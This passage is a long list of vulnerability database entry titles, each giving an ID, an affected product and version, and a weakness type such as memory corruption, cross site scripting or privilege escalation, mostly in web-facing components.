4.3.0 WebKit privilege escalation [118728] Apple watchOS up to 4.3.0 WebKit memory corruption [118727] Apple watchOS up to 4.3.0 WebKit race condition [118697] Apple tvOS up to 11.3 WebKit information disclosure [118696] Apple tvOS up to 11.3 WebKit information disclosure [118695] Apple tvOS up to 11.3 WebKit memory corruption [118694] Apple tvOS up to 11.3 WebKit privilege escalation [118693] Apple tvOS up to 11.3 WebKit memory corruption [118692] Apple tvOS up to 11.3 WebKit memory corruption [118691] Apple tvOS up to 11.3 WebKit memory corruption [118690] Apple tvOS up to 11.3 WebKit memory corruption [118689] Apple tvOS up to 11.3 WebKit privilege escalation [118688] Apple tvOS up to 11.3 WebKit memory corruption [118687] Apple tvOS up to 11.3 WebKit memory corruption [118686] Apple tvOS up to 11.3 WebKit race condition [118685] Apple tvOS up to 11.3 WebKit Data Processing Error [118540] dwebp-bin on Node.js Download weak encryption [118515] grunt-webdriver-qunit on Node.js Download weak encryption [118510] webrtc-native on Node.js weak encryption [118496] nodewebkit on Node.js Download weak encryption [118427] ws up to 1.1.0 on Node.js WebSocket privilege escalation [118417] console-io up to 2.2.13 on Node.js Web Console weak authentication [118414] Droppy up to 3.4.x on Node.js WebSocket Cross-Domain cross site request forgery [118383] TP-LINK TL-IPC40A-4 websys.lua weak authentication [118377] Synacor Zimbra Collaboration up to 8.7.11 Patch 3/8.8.8 Patch 3 Web Client Persistent cross site scripting [118324] webdrvr on Node.js Download weak encryption [118300] Jsonwebtoken Module up to 4.2.1 on Node.js Token weak encryption [118295] IBM Security Guardium Big Data Intelligence 3.1 Web UI cross site scripting [118260] PHP Scripts Mall Website Seller Script 2.0.3 user_submit.php cross site request forgery [118205] Fortinet FortiOS up to 5.6.2 SSL VPN Web Portal information disclosure [118195] BeaconMedaes Scroll Medical Air Systems TotalAlert Web Application privilege escalation [118194] BeaconMedaes Scroll Medical Air Systems TotalAlert Web Application Credentials privilege escalation [118155] IBM Tivoli Application Dependency Discovery Manager up to 7.1.2/7.2.1.4 AXIS Webapp happyaxis.jsp information disclosure [118110] HP Service Manager Software Web Tier up to 9.51 sql injection [118076] Joomla CMS up to 3.8.7 Web Install Application Password privilege escalation [117846] Cisco Unified Communications Manager Web Framework cross site scripting [117844] Cisco TelePresence Server Web UI privilege escalation [117828] Squid Web Proxy 3.5.27-20180318 sslBumpAccessCheck denial of service [117803] Solarwinds Serv-U up to 15.1.6 /Web%20Client/ denial of service [117709] Moxa EDR-810 4.1 Build 17030317 Web Server /MOXA\_LOG.ini denial of service [117708] Moxa EDR-810 4.1 Build 17030317 Web Server /MOXA\_CFG2.ini denial of service [117707] Moxa EDR-810 4.1 Build 17030317 Web Server /MOXA\_CFG.ini denial of service [117706] Moxa EDR-810 4.1 Build 17030317 Web Server net\_Web\_get_value privilege escalation [117705] Moxa EDR-810 4.1 Build 17030317 Web Server net\_Web\_get_value privilege escalation [117704] Moxa EDR-810 4.1 Build 17030317 Web Server net\_Web\_get_value privilege escalation [117703] Moxa EDR-810 4.1 Build 17030317 Web Server Password weak encryption [117700] Moxa EDR-810 4.1 Build 17030317 Web Server cross site request forgery [117699] Moxa EDR-810 4.1 Build 17030317 Web Server /goform/net_WebCSRGen privilege escalation [117698] Moxa EDR-810 4.1 Build 17030317 Web Server privilege escalation [117697] Moxa EDR-810 4.1 Build 17030317 Web Server Credentials privilege escalation [117696] Moxa EDR-810 4.1 Build 17030317 Web Server /goform/WebRSAKEYGen privilege escalation [117695] Moxa EDR-810 4.1 Build 17030317 Web Server net_WebPingGetValue privilege escalation [117662] D-Link DIR-816 A2 CN 1.10B05 GoAhead Web Server websRedirect memory corruption [117653] D-Link DIR-629-B1 /htdocs/cgibin weblogin_log memory corruption [117559] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117503] Microsoft Exchange Server 2013 CU19/2013 CU20/2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117500] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117406] IBM Cognos Analytics 11.0 Web UI cross site scripting [117358] JavaScript WebGL API GPU Memory Module 7PK Security Features [117356] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Administrative Console information disclosure [117302] Cisco WebEx Recording Format Player information disclosure [117301] Cisco WebEx Network Recording Player ARF Player privilege escalation [117300] Cisco IOS XR netconf Interface denial of service [117295] Cisco WebEx Network Recording Player up to T31.23.3 ARF Player privilege escalation [117290] Cisco Aironet 3800 8.5.100.0 Central Web Authentication privilege escalation [117288] Cisco Wireless LAN Controller up to 8.5.110.0 on IOS WebAuth Client weak authentication [117232] IBM API Connect up to 5.0.8.2 Web UI cross site scripting [117190] IBM BigFix Platform 9.2/9.5 Web UI cross site request forgery [117188] IBM BigFix Platform 9.2/9.5 Web UI cross site scripting [117177] Webdorado Form Maker by WD up to 1.12.23 on WordPress privilege escalation [117155] ovirt-engine up to 4.1.11.1/4.2.2.4 API/Administration Web Portal Credentials privilege escalation [117147] IBM Security QRadar SIEM 7.2/7.3 Web UI cross site scripting [117125] Advantech WebAccess HMI Designer 2.1.7.32 memory corruption [117124] Advantech WebAccess HMI Designer 2.1.7.32 pm3 File memory corruption [117123] Advantech WebAccess HMI Designer 2.1.7.32 pm3 File memory corruption [117122] GitLab Community Edition/Enterprise Edition up to 10.2 Webhooks privilege escalation [117118] IBM Jazz Reporting Service up to 5.0.2/6.0.5 Web UI cross site scripting [117092] IBM Jazz Reporting Service up to 5.0.2/6.0.5 Web UI cross site scripting [116974] Web-Dorado Instagram Feed WD Plugin up to 1.3.0 on WordPress cross site scripting [116973] Web-Dorado Instagram Feed WD Plugin up to 1.3.0 on WordPress cross site scripting [116969] IBM WebSphere MQ up to 8.0.0.8/9.0.4 denial of service [116965] IBM Cognos Business Intelligence 10.2/10.2.1/10.2.1.1/10.2.2 Web UI cross site scripting [116939] Easy File Sharing Web Server 7.2 EFS privilege escalation [116885] Cisco Unified Communications Manager Web Framework information disclosure [116878] Cisco ASA Web Server Authentication Required cross site scripting [116863] Cisco WebEx Business Suite Client SWF File privilege escalation [116847] IBM Sterling B2B Integrator 5.1/5.2 ActiveMQ Admin User Interface weak authentication [116839] Oracle Secure Global Desktop 5.3 Web Server memory corruption [116824] Oracle Agile PLM Framework 5.2 Web Client privilege escalation [116698] Oracle Access Manager 10.1.4.3.0/11.1.2.3.0/12.2.1.3.0 Web Server Plugin privilege escalation [116694] Oracle WebLogic Server 12.2.1.3 WLS Security privilege escalation [116691] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.2.0 Advanced UI privilege escalation [116687] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Sample Apps privilege escalation [116686] Oracle WebCenter Sites 11.1.1.8.0 Advanced UI privilege escalation [116685] Oracle WebCenter Portal 12.2.1.2.0/12.2.1.3.0 Security Framework privilege escalation [116683] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.2.0/12.2.1.3.0 Advanced UI privilege escalation [116682] Oracle WebCenter Content 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Content Server privilege escalation [116679] Oracle WebLogic Portal 10.3.6.0.0 privilege escalation [116675] Oracle Access Manager 10.1.4.3.0/11.1.2.3.0/12.2.1.3.0 Web Server Plugin privilege escalation [116673] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 WLS Core Components privilege escalation [116672] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 WL Diagnostics Framework privilege escalation [116671] Oracle WebCenter Portal 12.2.1.2.0/12.2.1.3.0 Security Framework privilege escalation [116618] Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1 Load Testing for Web Apps privilege escalation [116603] Oracle up to 16.2/17.12 Web Access privilege escalation [116599] Oracle Communications Order/Service Management 7.2.4.3.0/7.3.0.1.x/7.3.1.0.7/7.3.5.0.x WebUI privilege escalation [116587] Schneider Electric BMXNOR0200 Web Services memory corruption [116582] Schneider Electric 66074 MGE Network Management Card Integrated Web Server privilege escalation [116581] Schneider Electric 66074 MGE Network Management Card Integrated Web Server privilege escalation [116302] TIBCO JasperReports up to <=6.2.4 Spring Web Flows directory traversal [116299] IBM WebSphere Portal up to 8.0.0.1/8.5/9.0 Web UI cross site scripting [116298] IBM WebSphere MQ 8.0.0.8/9.0.0.2/9.0.4 Queue Manager privilege escalation [116228] D-Link DIR-815 up to 2.07.B01 /htdocs/web/getcfg.php information disclosure [116209] PHP Scripts Mall Website Broker Script 3.0.6 My Profile cross site scripting [116208] PHP Scripts Mall Website Seller Script 2.0.3 privilege escalation [116207] PHP Scripts Mall Website Seller Script 2.0.3 Listing Search Feature Reflected cross site scripting [116144] D-Link DIR-815 up to 2.03 Remote Administration Interface privilege escalation [116117] IBM WebSphere Portal 8.5/9.0 Web UI cross site scripting [116106] CMS Made Simple 2.2.7 moduleinterface.php Reflected cross site scripting [116105] CMS Made Simple 2.2.7 moduleinterface.php cross site request forgery [116103] CMS Made Simple 2.2.7 moduleinterface.php Reflected cross site scripting [115955] IBM WebSphere MQ up to 7.5.0.5/8.0.0.2 information disclosure [115809] IBM WebSphere DataPower Appliance up to 7.6 XML XML External Entity [115665] Ruby up to 2.2.9/2.3.6/2.4.3/2.5.0 WEBrick Server denial of service [115611] Apple watchOS up to 4.1 WebKit memory corruption [115610] Apple tvOS up to 11.1 WebKit memory corruption [115608] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115605] Apple watchOS up to 4.1 WebKit Redirect [115604] Apple tvOS up to 11.1 WebKit Redirect [115602] Apple iCloud up to 7.1 on Windows WebKit Redirect [115587] Apple tvOS up to 11.1 WebKit memory corruption [115585] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115583] Apple watchOS up to 4.1 WebKit memory corruption [115582] Apple tvOS up to 11.1 WebKit memory corruption [115580] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115551] Apple tvOS up to 10.1 WebKit information disclosure [115550] Apple iCloud up to 6.1 on Windows WebKit information disclosure [115488] Apple iCloud up to 7.3 on Windows WebKit information disclosure [115487] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115486] Apple iCloud up to 7.3 on Windows WebKit privilege escalation [115485] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115484] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115483] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115482] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115481] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115480] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115479] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115478] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115477] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115476] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115475] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115474] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115473] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115472] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115471] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115470] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115389] Apple tvOS up to 11.2 WebKit memory corruption [115388] Apple tvOS up to 11.2 WebKit memory corruption [115387] Apple tvOS up to 11.2 WebKit memory corruption [115386] Apple tvOS up to 11.2 WebKit memory corruption [115385] Apple tvOS up to 11.2 WebKit memory corruption [115384] Apple tvOS up to 11.2 WebKit memory corruption [115383] Apple tvOS up to 11.2 WebKit memory corruption [115382] Apple tvOS up to 11.2 WebKit memory corruption [115381] Apple tvOS up to 11.2 WebKit memory corruption [115380] Apple tvOS up to 11.2 WebKit memory corruption [115379] Apple tvOS up to 11.2 WebKit memory corruption [115378] Apple tvOS up to 11.2 WebKit memory corruption [115377] Apple tvOS up to 11.2 WebKit memory corruption [115376] Apple tvOS up to 11.2 WebKit memory corruption [115375] Apple tvOS up to 11.2 WebKit memory corruption [115374] Apple tvOS up to 11.2 WebKit memory corruption [115373] Apple tvOS up to 11.2 WebKit memory corruption [115372] Apple tvOS up to 11.2 WebKit Reachable Assertion [115361] Apple watchOS up to 4.2 WebKit information disclosure [115360] Apple watchOS up to 4.2 WebKit memory corruption [115359] Apple watchOS up to 4.2 WebKit memory corruption [115358] Apple watchOS up to 4.2 WebKit memory corruption [115357] Apple watchOS up to 4.2 WebKit memory corruption [115356] Apple watchOS up to 4.2 WebKit memory corruption [115355] Apple watchOS up to 4.2 WebKit memory corruption [115354] Apple watchOS up to 4.2 WebKit memory corruption [115353] Apple watchOS up to 4.2 WebKit memory corruption [115352] Apple watchOS up to 4.2 WebKit memory corruption [115351] Apple watchOS up to 4.2 WebKit Reachable Assertion [115263] IBM Financial Transaction Manager 3.0/3.0.2/3.0.2.1 Web UI cross site scripting [115262] IBM Business Process Manager 8.6 Web UI cross site scripting [115249] IBM Business Process Manager 8.6 Web UI cross site scripting [115245] IBM WebSphere MQ up to 9.0.4 Message privilege escalation [114953] IBM Jazz Foundation Web UI cross site scripting [114952] IBM Jazz Foundation Web UI cross site scripting [114951] IBM Jazz Foundation Web UI cross site scripting [114910] Webproxy 1.7.8 directory traversal [114896] IBM WebSphere Application Server 9 Form Login privilege escalation [114851] GitLab Community Edition up to 10.3 Web Hook privilege escalation [114766] Kentico CMS up to 10.0.49/11.0.4 Administration Interface sql injection [114720] OpenVPN up to 2.4.5 Management Interface Format String [114628] Webmin 1.840/1.880 Default Configuration /etc/shadow directory traversal [114607] OSIsoft PI Web API up to 2017 R2 cross site scripting [114605] OSIsoft PI Web API up to 2017 R2 Service Account privilege escalation [114599] Unitrends Backup up to 10.0.x User Interface /api/hosts weak authentication [114579] Microsoft Exchange Server up to 2017 CU8 Outlook Web Access information disclosure [114571] Microsoft Exchange Server 2016 CU7/2016 CU8 Outlook Web Access information disclosure [114570] Microsoft Exchange Server 2010 SP3/2013 CU18/2013 CU19/2016 CU7/2016 CU8 Outlook Web Access Fake information disclosure [114473] IBM WebSphere Portal 8.5/9.0 Web UI cross site scripting [114419] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Administrative Console information disclosure [114394] oVirt 4.2.0/4.2.1/4.2.2 Web Admin Application cross site scripting [114367] CMS Made Simple 2.2.6 moduleinterface.php cross site scripting [114363] CMS Made Simple 2.2.6 moduleinterface.php Stored cross site scripting [114341] WebLog Expert Web Server Enterprise 9.4 Service Port 9991 Data Processing Error [114335] Schneider Electric Pelco Sarix Professional up to 3.29 Web-based GUI memory corruption [114198] Cisco Web Security Appliance 10.5.1 FTP Server weak authentication [114020] Novell eDirectory up to 9.0.3.0 LDAP Interface weak encryption [113977] SAP NetWeaver Portal/WebDynpro Java 7.30/7.31/7.40/7.50 cross site scripting [113909] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Web UI cross site scripting [113803] uTorrent Web HTTP RPC Server privilege escalation [113705] IBM Maximo Asset Management 7.6 Web UI cross site scripting [113688] Asterisk HTTP Server res_http_websocket.c Data Processing Error [113676] Cisco Prime Collaboration Provisioning Tool Web Portal privilege escalation [113663] IBM Maximo Anywhere 7.5/7.6 Web UI cross site scripting [113484] 3S-Smart CODESYS Web Server memory corruption [113275] SAP HANA 1.00/2.00 SQL Interface Memory information disclosure [113274] SAP CRM WebClient UI up to 8.01 cross site scripting [113267] IBM Connections 4.0/4.5/5.0/5.5/6.0 Web UI cross site scripting [113209] PHP Scripts Mall News Website Script 2.0.4 Search sql injection [113189] Advantech WebAccess 8.3.0 Node\AspVBObj.dll VBWinExec privilege escalation [113124] LibreOffice up to 6.0.1 COM.MICROSOFT.WEBSERVICE File privilege escalation [113108] IBM WebSphere Portal 8.0/8.5/9.0 Web UI cross site scripting [113064] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Web UI cross site scripting [113002] IBM WebSphere Application Server up to 6.1.0.42/7.0.0.20/8.0.0.1 Virtual Member Manager javax.naming.directory.AttributeInUseException 7PK Security Features [112981] Cisco Unified Communications Manager Web Framework sql injection [112977] Cisco UCS Central Software up to 2.0 User Interface privilege escalation [112967] IBM API Connect 5.0.0.0 Web UI cross site scripting [112837] West Wind Web Server 6.x /ADMIN.ASP weak authentication [112651] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Administrative Console privilege escalation [112589] Apple macOS up to 10.13.3 WebKit memory corruption [112588] Apple macOS up to 10.13.3 WebKit memory corruption [112587] Apple macOS up to 10.13.3 WebKit memory corruption [112500] IBM Jazz Foundation 6.0.x Web UI cross site scripting [112492] IBM Cognos TM1 10.2/10.2.2 Web UI cross site scripting [112444] CMS Made Simple 2.2.5 moduleinterface.php cross site scripting [112443] CMS Made Simple 2.2.5 moduleinterface.php cross site scripting [112418] Advantech WebAccess SCADA up to 8.2 directory traversal [112417] Advantech WebAccess SCADA up to 8.2 sql injection [112368] Affiligator Affiliate Webshop Management System 2.1.0 search/ sql injection [112338] Symantec Reporter up to 9.5.4.0/10.1 Management Interface weak authentication [112290] Moodle 3.x Quiz Web Services Result information disclosure [112222] Cisco WebEx Meetings Server information disclosure [112221] Cisco WebEx Meetings Server Disabled Account 7PK Security Features [112220] Cisco WebEx Meetings Server information disclosure [112219] Cisco WebEx Meetings Server XML External Entity [112216] Cisco Unified Communications Manager Web Framework information disclosure [112204] Cisco NX-OS 7.3.2 Management Interface denial of service [112087] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC privilege escalation [112086] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC privilege escalation [112046] Oracle Hospitality Labor Management 8.5.1/9.0.0 Webservice Endpoint privilege escalation [112031] Oracle WebCenter Sites 11.1.1.8.0 Advanced UI information disclosure [112029] Oracle WebLogic Server 12.1.3.0.0/12.2.1.2.0/12.2.1.3.0 Web Services information disclosure [112028] Oracle HTTP Server Web Listener denial of service [112026] Oracle Access Manager 10.1.4.3.0 Web Server Plugin information disclosure [112025] Oracle Access Manager 11.1.2.3.0 Web Server Plugin information disclosure [112023] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Security Framework weak encryption [112022] Oracle HTTP Server Web Listener memory corruption [112018] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 WebCenter Spaces Application privilege escalation [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 privilege escalation [112016] Oracle WebCenter Content 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Content Server privilege escalation [112015] Oracle WebCenter Content 11.1.1.9.0 Content Server privilege escalation [112012] Oracle Business Intelligence Enterprise Edition 12.2.1.3.0 Analytics Web Dashboards privilege escalation [112008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.2.0/12.2.1.3.0 Sample Apps privilege escalation [112007] Oracle iPlanet Web Server 7.0 NSS memory corruption [112005] Oracle WebLogic Server 12.2.1.3.0 WLS Web Services privilege escalation [111999] Oracle Financial Services Profitability Management 6.1.x/8.0.x User Interface privilege escalation [111998] Oracle Financial Services Price Creation/Discovery 8.0.5 User Interface privilege escalation [111997] Oracle Financial Services Market Risk Measurement 8.0.5 User Interface privilege escalation [111996] Oracle Financial Services Market Risk 8.0.x User Interface privilege escalation [111995] Oracle Financial Services Loan Loss Forecasting 8.0.x User Interface privilege escalation [111994] Oracle Financial Services Liquidity Risk Management 8.0.x User Interface privilege escalation [111993] Oracle Financial Services Hedge Management 8.0.x User Interface privilege escalation [111992] Oracle Financial Services Funds Transfer Pricing 6.1.x/8.0.x User Interface privilege escalation [111991] Oracle Financial Services Balance Sheet Planning 8.0.x User Interface privilege escalation [111990] Oracle Financial Services Asset Liability Management 6.1.x/8.0.x User Interface privilege escalation [111989] Oracle 8.0.x User Interface privilege escalation [111945] Asus Router AsusWRT-Merlin router/httpd/web.c ej_update_variables memory corruption [111849] WordPress weblizar-pinterest-feeds Plugin 1.1.1 Plugin 1.1 wp-admin/admin-ajax.php cross site request forgery [111848] weblizar-pinterest-feeds Plugin 1.1.1 on WordPress wp-admin/admin-ajax.php cross site scripting [111847] weblizar-pinterest-feeds Plugin 1.1.1 on WordPress wp-admin/admin-ajax.php cross site scripting [111846] weblizar-pinterest-feeds Plugin 1.1.1 on WordPress wp-admin/admin-ajax.php cross site scripting [111803] Advantech WebAccess up to 8.2 File Upload privilege escalation [111802] Advantech WebAccess up to 8.2 memory corruption [111775] IBM WebSphere Portal 8.5/9.0 Web UI cross site scripting [111771] IBM Curam Social Program Management 6.0.5/6.1.1/6.2.0/7.0.1/7.0.2 Web UI cross site scripting [111770] IBM Curam Social Program Management 6.0.5/6.1.1/6.2.0/7.0.1 Web UI cross site scripting [111767] TP-LINK WVR/WAR/ER webfilter.lua privilege escalation [111752] TP-LINK WVR/WAR/ER interface_wan.lua privilege escalation [111748] TP-LINK WVR/WAR/ER interface_wan.lua privilege escalation [111705] IBM QRadar 7.2/7.3 Web UI cross site scripting [111697] IBM Security Access Manager 9.0.3 Web UI cross site scripting [111562] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation [111561] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation [111405] Advantech WebAccess up to 8.2 privilege escalation [111404] Advantech WebAccess up to 8.2 denial of service [111403] Advantech WebAccess up to 8.2 memory corruption [111402] Advantech WebAccess up to 8.2 directory traversal [111401] Advantech WebAccess up to 8.2 sql injection [111345] Cisco WebEx Network Recording Player ARF Player privilege escalation [111335] IBM Tivoli Key Lifecycle Manager 2.5/2.6/2.7 Web UI cross site scripting [111324] BEA WebLogic 3.1.8/4.0.4/4.5.1 privilege escalation [111323] pfSense up to 2.4.2 WebGUI csrf-magic.php privilege escalation [111287] Plone 2.5-5.1rc1 Web Template str.format privilege escalation [111277] EmbedThis GoAhead Webserver 4.0.0 CGI denial of service [111276] EmbedThis GoAhead Webserver up to 4.0.0 HTTP Listener memory corruption [111268] IBM WebSphere MQ 8.0/9.0 Channel Process privilege escalation [111210] Trustwave Secure Web Gateway up to 11.8.0.27 SSH Key /sendKey Key Management Error [111207] Webmin up to 1.869 custom/run.cgi cross site scripting [111130] Apple tvOS up to 11.1 WebKit memory corruption [111128] Apple iCloud up to 7.1 on Windows WebKit memory corruption [111041] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Error Message information disclosure [110925] IBM 10.0.0 Web UI cross site scripting [110881] IBM Business Process Manager 8.5 Web UI cross site scripting [110791] IBM WebSphere 8.5/9.0 information disclosure [110683] Python up to 3.6.3 URL Lib/webbrowser.py privilege escalation [110672] Fortinet FortiOS up to 5.2/5.4.2/5.6.2 SSL VPN Web Portal Session information disclosure [110652] IBM iNotes Web UI cross site scripting [110612] CMS Auditor Website 1.0 /news-detail sql injection [110597] Website Auction Marketplace 2.0.5 search.php sql injection [110555] Western Digital MyCloud PR4100 2.30.172 Web Administration multi_uploadify.php weak authentication [110552] Microsoft SharePoint Enterprise Server 2016 Web Request privilege escalation [110549] Microsoft Exchange Server 2016 CU6/2016 CU7 Outlook Web Access privilege escalation [110496] IBM Connections Engagement Center 6.0 Web UI cross site scripting [110494] IBM Sterling File Gateway 2.2 Web UI cross site scripting [110491] Palo Alto PAN-OS up to 6.1.18/7.0.18/7.1.13/8.0.5 Management Interface privilege escalation [110489] Palo Alto PAN-OS up to 6.1.18/7.0.18/7.1.13/8.0.5 Management Interface denial of service [110482] IBM Sterling File Gateway 2.2 Web UI cross site scripting [110480] IBM WebSphere Portal 7.0/8.0/8.5/9.0 cross site scripting [110334] IBM Connections 5.5 Web UI cross site scripting [110331] IBM Sterling B2B Integrator Standard Edition 5.2 Web UI cross site scripting [110327] IBM WebSphere MQ 7.5/8.0/9.0 RFH Header Data Processing Error [110321] IBM WebSphere MQ 8.0/9.0 privilege escalation [110188] Artica Web Proxy 3.06.112216 freeradius.users.php privilege escalation [110103] Splunk Enterprise up to 6.3.11/6.4.8/6.5.5/6.6.3.1/7.0.0.0 Web Impersonation privilege escalation [110099] Cisco WebEx Network Recording Player ARF/WRF File memory corruption [110098] Cisco WebEx Network Recording Player ARF/WRF File memory corruption [110097] Cisco WebEx Network Recording Player ARF/WRF File memory corruption [110096] Cisco WebEx Network Recording Player ARF/WRF File information disclosure [110095] Cisco WebEx Network Recording Player ARF/WRF File memory corruption [110094] Cisco WebEx Network Recording Player ARF/WRF File privilege escalation [110093] Cisco WebEx Meeting Center cross site scripting [110092] Cisco WebEx Event Center information disclosure [110090] Cisco WebEx Meeting Server Welcome Message privilege escalation [110087] Cisco WebEx Network Recording Player WRF Player denial of service [110086] Cisco WebEx Network Recording Player ARF Player memory corruption [110056] Cisco WebEx Meeting Center Access Control privilege escalation [110047] Fortinet FortiOS 5.0/5.2.12/5.4.6/5.6.2 Web Portal cross site scripting [110006] IBM WebSphere Commerce Enterprise 7.0/8.0 information disclosure [110002] IBM WebSphere MQ 8.0/9.0 denial of service [109979] TP-LINK TL-WVR/TL-WAR/TL-ER/TL-R uhttpd interface.lua get_device_byif privilege escalation [109778] Open Ticket Request System up to 3.3.19/4.0.25/5.0.23 Agent Interface Spelling.pm privilege escalation [109668] VMware vSphere Web Client up to 5.5/6.0 cross site request forgery [109651] Moxa EDS-G512E 5.1 Build 16072215 Administration Interface cross site scripting [109457] Cisco Web Security Appliance Advanced Malware Protection privilege escalation [109456] Cisco Unified Communications Manager SQL Database Interface sql injection [109427] PSFTPd 10.0.4 Build 729 Graphical User Interface privilege escalation [109316] Schneider Electric InduSoft Web Studio/InTouch Machine Edition up to 8.0 SP2 Patch 1 memory corruption [109171] TinyWebGallery 2.4 cross site scripting [109157] Siemens SIMATIC PCS 7 up to 8.1 DCOM Interface privilege escalation [109156] Advantech WebAccess up to 8.2 memory corruption [109153] Advantech WebAccess up to 8.2 denial of service [108907] Cisco WebEx Meetings Server HTTP Header Reply information disclosure [108898] Cisco Prime Collaboration Provisioning up to 12.2 SQL Database Interface privilege escalation [108879] IBM InfoSphere Bigesights 4.2.0/4.2.5 Web UI cross site scripting [108860] Intel McAfee Network Data Loss Prevention 9.3.x Webserver information disclosure [108738] Fortinet FortiOS up to 5.6.0 WebUI cross site scripting [108711] Fortinet FortiOS up to 5.4.5 Web API privilege escalation [108642] IBM Tivoli Endpoint Manager 9.2/9.5 Web UI cross site scripting [108619] IBM Jazz Foundation Web UI cross site scripting [108607] IBM WebSphere Application Server 3.13 JSF information disclosure [108587] Cisco WebEx Meetings Server up to 1.0 Entropy weak encryption [108513] Apple tvOS up to 10.2.2 WebKit cross site scripting [108512] Apple tvOS up to 10.2.2 WebKit information disclosure [108511] Apple tvOS up to 10.2.2 WebKit memory corruption [108510] Apple tvOS up to 10.2.2 WebKit memory corruption [108509] Apple tvOS up to 10.2.2 WebKit memory corruption [108508] Apple tvOS up to 10.2.2 WebKit memory corruption [108507] Apple tvOS up to 10.2.2 WebKit memory corruption [108506] Apple tvOS up to 10.2.2 WebKit memory corruption [108505] Apple tvOS up to 10.2.2 WebKit memory corruption [108504] Apple tvOS up to 10.2.2 WebKit memory corruption [108503] Apple tvOS up to 10.2.2 WebKit memory corruption [108502] Apple tvOS up to 10.2.2 WebKit memory corruption [108501] Apple tvOS up to 10.2.2 WebKit memory corruption [108500] Apple tvOS up to 10.2.2 WebKit memory corruption [108499] Apple tvOS up to 10.2.2 WebKit memory corruption [108498] Apple tvOS up to 10.2.2 WebKit memory corruption [108497] Apple tvOS up to 10.2.2 WebKit memory corruption [108496] Apple tvOS up to 10.2.2 WebKit memory corruption [108495] Apple tvOS up to 10.2.2 WebKit memory corruption [108291] FiberHome Router /cgi-bin/webproc directory traversal [108290] Webmin up to 1.859 File Manager cross site scripting [108289] Webmin 1.850 at/create_job.cgi cross site request forgery [108288] Webmin 1.850 tunnel/link.cgi privilege escalation [108274] Cisco WebEx Meetings Server denial of service [108263] Cisco Cloud Services Platform 2100 2.1.0 Web Console privilege escalation [108168] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Web privilege escalation [108139] Oracle Hospitality Cruise Fleet Management 9.0.2.0 GangwayActivityWebApp privilege escalation [108134] Oracle Hospitality Suite8 8.10.1/8.10.2 WebConnect information disclosure [108130] Oracle Hospitality Guest Access 4.2.0/4.2.1 Interface information disclosure [108125] Oracle Hospitality Cruise Fleet Management 9.0.2.0 GangwayActivityWebApp privilege escalation [108123] Oracle Hospitality Suite8 8.10.1/8.10.2 WebConnect information disclosure [108119] Oracle Hospitality Suite8 8.10.1/8.10.2 WebConnect information disclosure [108111] Oracle Hospitality Suite8 8.10.1/8.10.2 WebConnect privilege escalation [108098] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 Web Container information disclosure [108097] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 Web Container privilege escalation [108096] Oracle HTTP Server 11.1.1.9.0/12.1.3.0.0 Web Listener information disclosure [108095] Oracle Access Manager 11.1.2.3.0 Web Server Plugin information disclosure [108094] Oracle GlassFish Server 3.1.2 Administration Graphical User Interface privilege escalation [108092] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 WLS-WebServices privilege escalation [108091] Oracle HTTP Server Web Listener weak encryption [108089] Oracle GlassFish Server 3.0.1/3.1.2 Web Container privilege escalation [108088] Oracle GlassFish Server 3.0.1/3.1.2 Web Container privilege escalation [108087] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Analytics Web General privilege escalation [108086] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 Web Container information disclosure [108077] Oracle BI Publisher 